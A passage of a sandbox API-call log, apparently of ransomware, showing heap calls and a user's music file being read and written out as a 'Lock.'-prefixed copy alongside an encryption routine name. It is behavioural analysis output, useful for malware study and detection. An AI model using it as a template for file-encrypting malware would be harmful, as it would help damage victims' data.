(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0245.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0245.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0245.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0245.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0245.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0245.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0245.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0245.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.802] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\n2lzfQolvCVgNf.m4a" (normalized: "c:\\users\\fd1hvy\\music\\n2lzfqolvcvgnf.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0245.802] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.802] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0245.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0245.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0245.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0245.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x978490 [0245.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.803] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0245.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0245.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0245.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0245.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.n2lzfQolvCVgNf.m4a" (normalized: "c:\\users\\fd1hvy\\music\\lock.n2lzfqolvcvgnf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0245.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0245.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0245.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0245.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0245.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0245.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0245.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0245.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0245.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5f020 [0245.809] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0245.809] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0245.813] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x3c1, lpOverlapped=0x0) returned 1 [0245.814] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0245.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0245.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0245.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0245.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x103c1) returned 0x2f14010 [0245.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f020 | out: hHeap=0x970000) returned 1 [0245.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0245.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0245.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0245.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0245.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0245.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0245.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x103c1) returned 0x2f243e0 [0245.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0245.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0245.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0245.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0245.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x103c1) returned 0x2f14010 [0245.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0245.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0245.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0245.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0245.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c38 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0245.868] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c38 | out: hHeap=0x970000) returned 1 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x103c1) returned 0x2f14010 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0245.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, 